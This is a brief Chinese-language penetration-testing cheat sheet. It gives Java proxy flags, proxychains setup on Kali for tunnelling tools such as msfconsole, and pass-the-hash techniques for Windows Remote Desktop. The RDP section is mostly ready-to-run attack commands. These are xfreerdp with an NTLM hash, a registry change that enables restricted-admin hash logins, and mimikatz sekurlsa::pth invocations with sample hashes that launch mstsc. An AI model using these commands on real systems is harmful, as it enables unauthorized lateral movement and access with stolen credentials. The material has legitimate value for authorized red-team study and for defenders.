Java走socks5和http代理

Java走Socks5代理
java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=1111 -jar
Java走http/https代理
java -Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=8080 -jar
java -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=8080 -jar

Kali代理

配置proxychains：
vim /etc/proxychains4.conf
添加kali的socks4a、socks5服务的IP和端口
利用curl命令查看代理是否搭建成功
proxychains4 curl 192.168.183.129:2002
proxychains的-q参数是指在运⾏时不输出proxychains的⽇志信息
例如:proxychains4 -q msfconsole

Hash登录RDP

xfreerdp登录远程桌面，前提是需要开启hash登录，2012默认开启，在windows2008的机器上面需要服务器打KB2984972，打完补丁注册表默认没有DisableRestrictedAdmin这个键值对，需要自己添加:
xfreerdp /u:ABC /p:123456 /v:192.168.91.128:3389 /tls-seclevel:0 /timeout:80000
xfreerdp /pth:32ed87bdb5fdc5e9cba88547376818d4 /u:ABC /v:192.168.91.128:3389 /tls-seclevel:0 /timeout:80000
修改注册表命令（需要管理员权限）：
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
查看是否开启Hash登录
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
REG_DWORD 0x0 存在就是开启

mimikatz Hash登录
管理员启动mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:10_0_4_16 /ntlm:79787b7d4c0f25d6dcb0f6accf8f599e "/run:mstsc.exe /restrictedadmin"
domain参数可以使用.代替：
sekurlsa::pth /user:Administrator /domain:. /ntlm:ab8f86f799b772a74a50456412f862ea "/run:mstsc.exe /restrictedadmin"
在弹出的mstsc窗口中填写远程桌面的IP和端口即可。